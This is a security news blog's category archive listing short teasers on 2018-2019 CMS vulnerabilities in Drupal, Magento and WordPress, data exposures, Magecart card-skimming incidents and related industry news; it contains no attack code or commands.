Archive for the ‘website security’ Category

Drupal Releases Core CMS Updates to Patch Several Vulnerabilities

April 17th, 2019
Drupal, the popular open-source content management system, has released security updates to address multiple "moderately critical" vulnerabilities in Drupal Core that could allow remote attackers to compromise the security of hundreds of thousands of websites. According to the advisories published today by the Drupal developers, all security vulnerabilities Drupal patched this month reside in

Posted in Cross site scripting, cybersecurity, Drupal, Drupal hacking, hacking news, JQuery, php security, remote code execution, Vulnerability, website security | Comments (0)

Over 100 Million JustDial Users’ Personal Data Found Exposed On the Internet

April 17th, 2019
An unprotected database belonging to JustDial, India's largest local search service, is leaking personally identifiable information of its every customer in real-time who accessed the service via its website, mobile app, or even by calling on its fancy "88888 88888" customer care number, The Hacker News has learned and independently verified. Founded over two decades ago, JustDial (JD) is the

Posted in API Security, cyber security, data breach, data leaked, Database Security, hacking news, Just dial, mobile api security, server security, unprotected database, website security | Comments (0)

Critical Magento SQL Injection Vulnerability Discovered – Patch Your Sites

March 29th, 2019
If your online e-commerce business is running over the Magento platform, you must pay attention to this information. Magento yesterday released new versions of its content management software to address a total of 37 newly-discovered security vulnerabilities. Owned by Adobe since mid-2018, Magento is one of the most popular content management system (CMS) platform that powers 28% of

Posted in eCommerce Software, hacking news, Magento, Magento Ecommerce Website, Magento Hacking, Magento Vulnerability, SQL injection, Vulnerability, website hacking, website security | Comments (0)

Brace yourselves: exploit published for serious Magento bug allowing card skimming (Updated)

March 28th, 2019
Brace yourselves: exploit published for serious Magento bug allowing card skimming (Updated)

Enlarge (credit: Mighty Travels / Flickr)

Attack code was published on Friday that exploits a critical vulnerability in Magento e-commerce platform, all bug guaranteeing it will be used to plant payment card skimmers on sites that have yet to install a recently released patch.

PRODSECBUG-2198 is a SQL injection vulnerability that attackers can exploit with no authentication required. Hackers could exploit the flaw to take administrative control of administrator accounts, assuming the hackers can download user names and password hashes and crack the hashes. From there, attackers could install the backdoors or skimming code of their choice. A researcher at Web security firm Sucuri said Thursday that company researchers reverse-engineered an official patch released Tuesday and successfully created a working proof of concept exploit.

Over the past six months, a raft of competing crime gangs has been racing to infect commerce sites with JavaScript that surreptitiously steals purchasers’ credit card data. The compromises are the result of exploits against either known or zeroday vulnerabilities. A vulnerability of this severity in an e-commerce platform that boasts 300,000 businesses and merchants is almost certainly going to face in-the-wild attacks by the same card-skimmer gangs.

Read 10 remaining paragraphs | Comments

Posted in Biz & IT, card skimmers, exploits, Magento, vulnerabilities, website security | Comments (0)

New MageCart Attacks Target Bedding Retailers My Pillow and Amerisleep

March 20th, 2019
Cybersecurity researchers today disclosed details of two newly identified Magecart attacks targeting online shoppers of bedding retailers MyPillow and Amerisleep. Magecart is an umbrella term researchers gave to at least 11 different hacking groups that are specialized in implanting malware code on e-commerce websites with an intent to steal payment card details of their customers silently.

Posted in banking security, credit card hacking, credit card security, Credit Card Skimmers, Credit card skimming, digital skimmer, magecart, Online Security, website hacking, website security | Comments (0)

New WordPress Flaw Lets Unauthenticated Remote Attackers Hack Sites

March 14th, 2019
If for some reason your WordPress-based website has not yet been automatically updated to the latest version 5.1.1, it's highly recommended to immediately upgrade it before hackers could take advantage of a newly disclosed vulnerability to hack your website. Simon Scannell, a researcher at RIPS Technologies GmbH, who previously reported multiple critical vulnerabilities in WordPress, has once

Posted in hack wordpress, hacking news, website security, WordPress, WordPress exploit, Wordpress hacking, WordPress Vulnerability | Comments (0)

F5 Networks Acquires NGINX For $670 Million

March 12th, 2019
One of the most important software companies NGINX, which is also behind the very popular open-source web server of the same name, is being acquired by its rival, F5 Networks, in a deal valued at about $670 million. While NGINX is not a name that you have ever heard of, the reality is that you use NGINX every day when you post a photo, watch streaming video, purchase goods online, or log

Posted in Apache web server, F5 Networks, Load Balancer, Nginx, reverse proxy, web application firewall, Web Application Security, web hosting, web server, website security | Comments (0)

Hackers Actively Exploiting Latest Drupal RCE Flaw Published Last Week

February 26th, 2019
Cybercriminals have actively started exploiting an already patched security vulnerability in the wild to install cryptocurrency miners on vulnerable Drupal websites that have not yet applied patches and are still vulnerable. Last week, developers of the popular open-source content management system Drupal patched a critical remote code execution (RCE) vulnerability (CVE-2019-6340) in Drupal

Posted in cryptocurrency, cyber security, Drupal, Drupal exploit, drupal hacked, Drupal hacking, hacking news, remote code execution, website security | Comments (0)

DHS Orders U.S. Federal Agencies to Audit DNS Security for Their Domains

January 23rd, 2019
The U.S. Department of Homeland Security (DHS) has today issued an "emergency directive" to all federal agencies ordering IT staff to audit DNS records for their respective website domains, or other agency-managed domains, within next 10 business days. The emergency security alert came in the wake of a series of recent incidents involving DNS hijacking, which security researchers with "

Posted in certificate authority, certificate transparency, Cyber Attack, DHS, digital Certificate, DNS hijacking, dns security, DNS server, Government, Homeland Security, HTTPS, website security | Comments (0)

E-commerce site is infected not by one, but two card skimmers

November 20th, 2018
E-commerce site is infected not by one, but two card skimmers

Enlarge (credit: Mighty Travels)

Payment card skimming that steals consumers’ personal information from e-commerce sites has become a booming industry over the past six months, with high-profile attacks against Ticketmaster, British AirwaysNewegg, and Alex Jones’ InfoWars, to name just a few. In a sign of the times, security researcher Jérôme Segura found two competing groups going head to head with each other for control of a single vulnerable site.

The site belongs to sportswear seller Umbro Brasil, which as of Tuesday morning was infected by two rival skimmer groups. The first gang planted plaintext JavaScript on the site that caused it to send payment card information to the attackers as customers were completing a sale. The malicious JavaScript looked like this:

A second gang exploited either the same or a different website vulnerability as the first. The second group then installed much more advanced JavaScript that was encoded in a way to prevent other programs from seeing what it did. This is what it looked like:

Read 8 remaining paragraphs | Comments

Posted in Biz & IT, card skimmers, magecart, website security | Comments (0)